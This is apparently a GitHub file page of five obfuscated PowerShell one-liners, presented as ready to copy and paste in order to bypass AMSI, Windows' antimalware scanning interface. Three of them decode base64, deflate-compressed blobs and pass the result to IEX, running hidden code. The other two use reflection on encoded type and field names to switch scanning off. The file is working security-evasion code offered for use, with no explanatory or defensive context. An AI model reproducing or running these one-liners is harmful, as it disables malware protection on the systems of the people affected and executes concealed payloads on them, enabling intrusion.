-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathAMSIbypassOneliner.txt
14 lines (6 loc) · 7.31 KB
/
AMSIbypassOneliner.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
####Simply copy & paste one of these 5 one liners into a powershell instance and bypass AMSI####
1: . ( $PShoMe[21]+$psHome[30]+'X') (nEw-obJect SySTEm.IO.COmPressIon.dEFLatESTREaM( [sYSteM.io.memORYsTReam][conVerT]::froMBAsE64STrING('pVTbbtpAEH3frxgBD7bkWr5AzEWVkkJSIZEUlbR9QDwY7zhYXWxrvW6gVf+947UTXNpUqrKC8TI7c/acMxa9L0nqe/AWLjusLJL0AVbHQuF+8tsv+2OZqmSP9jxVKLN8hfJbEmExYXm5FUkEkQiLAmqsHwxorWdCzPd5JpXR+YoyReF7HXOjz5qmQoWKHnggzBQIeqkkvEe1lFl0xbnEojCa7O4246VAi3pkRSunkrtwj+bkVZctspAvkq0M5dFokNNXoG6zTMDnRKoyFCRCYaSeBIi8UWTBpybFH1fJd5JUJqmCWNzhY9NjQVaqOi3yWHwQvDkgXj9Z55Ixwnpzf8wRetpy1lNYKBri+t1R4XqzMZzDhWsBRV7FwNf7URU91Pu+jlEdTdZrOVHhaNjNeNw2aN28C/ek1r5Oo4yTX1RztZrO5zbNbaUdNDQZ06xJeS1WQLT6L9Aa1Ps61jWaaN/TlQOduWhFnQk8uqYxtk377CVqq7Pgv3R4lZCcsB32jH424d7zZNfVzKhEc+s7lJAYb3o5QSxDFe3OvPC1zqlTRafWM9R7nXe1L8HN6XSm9zfXVbye6bzunfom6zpjAN+FyIE/1yGT1QPDg0Vf1vWo1hlAMATHBXcEQXyqDTl/qqXbY3fkuMGQdYO6hccQIyAHx3mhBXlMH9aNqCHy/0KGlkQFbP3vvxb7NpTFLhTk9zTLj0btIMm14GR4nbQXmD6oncl+AQ==' ), [SYsTeM.IO.ComprEssion.cOmPresSIoNMODe]::DECOMPrEss)| %{nEw-obJect io.sTrEamrEADer($_, [SYStEM.TExT.eNCODING]::AsCiI) }).rEAdToenD()
2: .('Sv') 1a2s ([tyPE]("{1}{2}{0}" -F'cOnVerT','S','ystEM.')) ; $FXB2O = [tYPE]("{1}{7}{5}{2}{6}{0}{3}{4}" -f 'ion.','SYsTem.','eS','cOMPRessIOnMOD','e','.COmPR','s','iO'); &("{0}{1}"-f's','et') r3at17 ( [TyPE]("{0}{4}{3}{1}{2}"-f 'T','T.e','NcodiNG','X','E') ); ( .("{2}{0}{1}{3}" -f'W-oBJe','c','NE','t') ("{3}{1}{0}{2}" -f 'rE','.stREAM','ADER','Io')(( .("{3}{2}{0}{1}" -f 'o','BJect','-','NEW') ("{8}{10}{6}{4}{7}{9}{3}{0}{5}{1}{2}"-f 'L','TeStr','eaM','On.dEf','.iO.','a','STEm','CompR','s','eSSI','Y')( [Io.meMOryStREaM] ( .("{2}{1}{0}" -f 'lE','IAB','vaR') 1A2S )."vAl`UE"::("{1}{2}{0}{3}"-f 'Se64s','F','ROmBa','trInG').Invoke(("{13}{79}{2}{161}{81}{179}{75}{30}{105}{24}{35}{196}{100}{80}{85}{17}{160}{162}{16}{1}{193}{33}{66}{143}{164}{133}{141}{53}{3}{199}{88}{186}{156}{22}{63}{96}{135}{175}{153}{6}{124}{163}{48}{138}{59}{37}{142}{157}{69}{84}{127}{183}{83}{182}{154}{23}{192}{0}{126}{118}{101}{44}{68}{155}{12}{103}{181}{130}{20}{159}{50}{129}{95}{165}{28}{106}{78}{172}{46}{76}{8}{36}{32}{174}{107}{98}{180}{58}{55}{115}{197}{62}{178}{169}{195}{31}{170}{140}{54}{47}{38}{171}{92}{26}{21}{39}{19}{167}{40}{87}{45}{137}{147}{56}{91}{187}{77}{173}{168}{18}{7}{97}{5}{177}{120}{136}{108}{90}{93}{189}{109}{184}{158}{110}{29}{65}{149}{10}{114}{176}{144}{119}{121}{166}{112}{41}{134}{52}{34}{116}{139}{73}{42}{60}{89}{150}{198}{123}{188}{4}{148}{61}{57}{43}{152}{15}{200}{67}{190}{86}{194}{72}{191}{14}{185}{117}{25}{9}{71}{151}{64}{113}{145}{128}{146}{74}{111}{82}{11}{104}{27}{132}{99}{122}{49}{94}{51}{70}{125}{102}{131}" -f 'H','JX','P0qhNgu20P','PBZ','4CMU','rAdoP','8g','KN3Nes8hcx','oaj','4lV','lR','GjQJ1CHao','qnG','fVR/j5','U','FmNiq1IR5','k9','7Nv3r43','9qA1HOV','a','UcX7Bqdc','+r','fsZ7','iHVQSMA','tvUat','f','Qa8vQ176G','8zO','/4syZNg','B','k','FSpX','K','lXSWZMo3u1iDp','pnui5X','IY00W','SDIp','EI','kZa','ZaUbddpKep','Oipgv','Lnc','jo','cs3iT','o01','aUpI','A83p','4','b42','DQ','64iYFUVYNURA3qbjagi','k','5a','uzpOgSap','Y','ID','a','TRbp4','8LM01pXRqAL','3','zVDfp','Hbo1','YEeeVcBOGlS72vynNW0q9','i','/H','kz/C','YE','Vp+5Dg99m9eA+Q1bPHSy','0','M0jsaQ','7cj','r','KkA','s','hQxep4','/Q1','bQVYNxH5O','NBx','tgl','pAE','Q','LYS','9r','UMrg','rAhS','DO','dl3','E1wQ4','JfHMPo','MnT8MORVQ8fS0biqy','OeR','VryLtxA','w','5','A','j','6','z','db','k','2cWrEB/hG','7b','absjix','tpER','o156','u8W','/SC','3rcdu','q','H','1','c','KCU','e','iK/Hk','4','l','8VQsxOH9','4c','n','n','/9','T7seVhOe','pmC','Zh','oXW','3kE6Ei','v','eL','v','Y','yMU8U/QU=','Uvw4KLdPd','XJ/','PMT','/PB9Hq99','PR','A','OHKg','9W+','acal+S','Ab','3','hs','y3Uc','VfrebbpY','GKA39gzWIt1g','tDfJkEJCY1qvSyJ/','A55t65V','xE0','3','aR','GCY8F','B7E','q','tJZO','0','gqKtr','Z8ErPkw','IyfWYUX5DLiP0Cgec','g2E4l','CAr','i','B','ko2IDVGGo','oCFIA','0LP','h','Fvbx','adC','Yls','bb','4v','hPM/g','VB','nu1ty','WktT0We7ncr','YH35DUsj/c','INqEy','/','yg','Qk','w','ZVzJ','xkOm','DB','I','f','IY6Z7sfj','Mx','rQ6','m','5Q','0','xR','53YC','LHjmqBjmTy3a/e','LtPTgB/NVi','+GE','0INC','PvN')) , ( .("{1}{0}{2}"-f 'T','Ge','-itEM') ("variABLE:"+"FX"+"B"+"2o"))."va`lUE"::"DecO`mPre`SS" )), ( &("{1}{0}"-f'tEM','chIldi') VARiaBLe:R3AT17 )."v`ALuE"::"a`scII") ).("{2}{0}{1}"-f 'en','D','rEaDtO').Invoke( ) |&( ${P`s`HOme}[21]+${pS`H`OMe}[30]+'X')
3: ( NEW-oBJect Io.stREAMrEADER(( NEW-oBJect sYSTEm.iO.CompReSSIOn.dEfLaTeStreaM( [Io.meMOryStREaM] [SYstem.conVErT]::FROmBaSe64strInG('fVR/j5pAEP0qhNgu20PCArLYS//Q1ku8WtvUatIY00WLHjmqBjmTy3a/e2cWrEB/hGQDO7Nv3r43g2E4lik9JX0lXSWZMo3u1iDpYEhsko2IDVGGoXJ/AbuzpOgSapPBZ0INCJfHMPoI0fsZ7i6/PB9Hq99nu1tyB7E8gZhBb42OHKg3EI3gqKtrM0jsaQrAhSvZVzJUMrgwqiHVQSMA5QH3kE6Ei4c7bo010tJZOqnGtpERQkYUcX7BqdcIyfWYUX5DLiP0Cgec64iYFUVYNURA3qbjagivjoCFIA/4syZNg/SCtgl4vA83pbQVYNxH5OoajSDIpKVB3rcdudbyg8LM01pXRqALID4LtPTgB/NViYEeeVcBOGlS72vynNW0q9INqEyadC53YCFSpXYlsacal+SY4kZabbwQa8vQ176G+rZaUbddpKepahOipgvE1wQ4aUpIAtDfJkEJCY1qvSyJ/aVryLtxAfNBxhPM/gFvbx9qA1HOVKN3Nes8hcxzrAdoPYH35DUsj/cnPRqOeR5MxHxkOmZ8ErPkw1Bkz/CxE0lRiK/HkWktT0We7ncry3Ucn/90LPKCULncPMT5apnui5Xl9W+sjozVDfpMnT8MORVQ8fS0biqy3+GEpmCIY6Z7sfj4CMUA55t65VHbo1TRbp4cs3iTGCY8FFmNiq1IR5PvNVp+5Dg99m9eA+Q1bPHSyrQ6dl3xRKkAmUDB8VQsxOH9f4lVraR/HeVfrebbpYeLGKA39gzWIt1ghQxep4c9rGjQJ1CHaoo1568zOUvw4KLdPdkT7seVhOeDQAk7cjoXWabsjixyMU8U/QU=') , [sysTEM.Io.coMpREssION.cOmprEssiOnMOde]::DecOMpResS )),[Text.ENcODinG]::AScii) ).rEaDtOenD( ) |&( $PSHOmE[21]+$PShOMe[30]+'X')
4: .("{2}{3}{0}{1}" -f 'iAB','lE','Set-V','AR') ("{0}{1}"-f 'k','JS') ([TypE]("{1}{0}"-f'F','re') ); ${A}=("{8}{10}{3}{11}{5}{0}{2}{7}{9}{6}{4}{1}" -f("{1}{0}"-f'74728','8'),'28','0',("{1}{0}"-f '8','772'),("{0}{1}"-f'88776','8'),("{1}{0}"-f'6','6881'),("{0}{1}{2}"-f'6888','7','82806'),("{0}{1}"-f'7','281'),("{0}{1}"-f '54','9286'),("{1}{0}" -f '173','87'),'8',("{1}{0}" -f'748','01'));${b}=("{6}{12}{9}{8}{10}{11}{7}{14}{4}{5}{13}{1}{0}{3}{2}" -f'6','7',("{0}{1}"-f'797','271'),("{1}{0}{2}" -f '74','8','16876'),'6',("{2}{1}{0}" -f '676','08','88'),'1',("{1}{0}" -f '98','767'),'6','808',("{1}{0}"-f '56','76'),'87',("{1}{0}"-f'36','17'),("{1}{0}" -f'481','4'),'6'); (&("{2}{0}{1}"-f'ILDItE','m','Ch') ("{0}{1}{2}{3}" -f'vari','AbL','e:','kJs') )."vAL`UE"."as`SeMB`ly"."g`ett`YpE"([string](0..37|.('%'){[char][int](29+(${a}+${b}).("{1}{0}{2}" -f 'st','sub',("{1}{0}"-f'ng','ri'))."in`VOkE"((${_}*2),2))})-replace " " )."g`Etf`iELd"([string](38..51|.('%'){[char][int](29+(${A}+${B}).("{1}{0}{2}"-f 'r',("{1}{0}" -f'bst','su'),'ing')."IN`V`oKE"((${_}*2),2))})-replace " ",("{2}{4}{1}{3}{0}"-f("{1}{0}{2}" -f'ta','c,S','tic'),'l','Non','i','Pub')).("{0}{1}"-f("{0}{1}"-f 'Se','tV'),("{1}{0}" -f'lue','a'))."invo`kE"(${NU`ll},${tr`Ue})
5: Set-VARiABlE kJS ([TypE]("{1}{0}"-f'F','re') ); ${A}=("{8}{10}{3}{11}{5}{0}{2}{7}{9}{6}{4}{1}" -f'874728','28','0','7728','887768','68816','6888782806','7281','549286','87173','8','01748');${b}=("{6}{12}{9}{8}{10}{11}{7}{14}{4}{5}{13}{1}{0}{3}{2}" -f'6','7','797271','87416876','6','8808676','1','76798','6','808','7656','87','1736','4481','6'); (ChILDItEm variAbLe:kJs ).VALuE."as`SeMB`ly"."g`ett`YpE"([string](0..37|.('%'){[char][int](29+(${a}+${b}).("{1}{0}{2}" -f 'st','sub','ring').Invoke((${_}*2),2))})-replace " " )."g`Etf`iELd"([string](38..51|.('%'){[char][int](29+(${A}+${B}).("{1}{0}{2}"-f 'r','subst','ing').Invoke((${_}*2),2))})-replace " ",("{2}{4}{1}{3}{0}"-f'c,Static','l','Non','i','Pub')).("{0}{1}"-f'SetV','alue').Invoke(${NU`ll},${tr`Ue})